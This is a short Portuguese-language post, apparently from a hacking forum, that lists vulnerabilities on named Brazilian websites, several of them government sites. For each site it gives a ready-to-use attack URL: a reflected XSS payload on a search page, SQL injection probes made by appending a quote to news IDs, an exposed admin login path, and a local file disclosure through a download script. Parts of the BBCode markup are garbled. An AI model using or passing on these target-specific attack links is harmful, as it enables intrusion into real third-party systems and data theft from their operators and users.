Site: www.brasil.com.br

Falha: XSS (Cross Site Scrpting)

Link Da falha xss:

Código:


[url=http://brasil.com.br/busca?q=img src=]http://brasil.com.br/busca?q=[img]http://i44.servimg.com/u/f44/16/24/23/28/logo10.png[/img]alert("FUSION SA:MP")&commit=Buscar[/url]


----

Site: www.gruposilviosantos.com.br

Falha: SQL Injection

Link da falha:
http://www.gruposilviosantos.com.br/noticia.asp?cod=80'

Page Adm:
http://www.gruposilviosantos.com.br/adm/login.asp

[color=green]


---
[b]
Site:
http://www.funac.ma.gov.br

Falha:
Fopen/LFD

Link da falha:

Código:

 http://www.funac.ma.gov.br/download.php?arquivo=index.php


----

Site:
http://www.energia.sp.gov.br


Falha:
SQL Injection


Link da falha:

Código:


 http://www.energia.sp.gov.br/lenoticia.php?id=224']http://www.energia.sp.gov.br/lenoticia.php?id=224'



Fui Smile